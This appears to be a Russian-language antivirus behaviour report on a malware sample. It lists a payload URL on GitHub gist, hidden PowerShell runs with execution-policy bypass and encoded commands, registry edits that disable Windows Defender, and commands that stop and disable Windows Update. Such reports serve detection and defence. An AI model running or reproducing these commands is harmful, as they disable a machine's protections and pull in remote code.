Техническая информация
- Обновления системы (Windows Update)
- https://gist.githubusercontent.com/sslsecurityonline/f24b98d89d6b0c1ef7c3d24e788348de/raw/6e3cb9665c02065cc2487aa1d3228e2531636fd0/aa
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQAKAGMAbQBkACAALwBjACAAcgBlAGcAIABhAGQAZA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -exec bypass -ec JABjAG8AbQAgAD0AIAAiAFUAdwBCAGwAQQBIAFEAQQBMAFEAQgBOAEEASABBAEEAVQBBAEIAeQBBAEcAVQBBAFoAZwBCAGwAQQBIAEkAQQBaAFEAQgB1AEEARwBNAEEAWgBRAEEAZwBBAEMAMABBAFIAQQBCAHAAQQBIAE0AQQB...
- '<SYSTEM32>\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c sc stop wuauserv
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\cmd.exe' /c sc config wuauserv start= disabled
- '<SYSTEM32>\sc.exe' config wuauserv start= disabled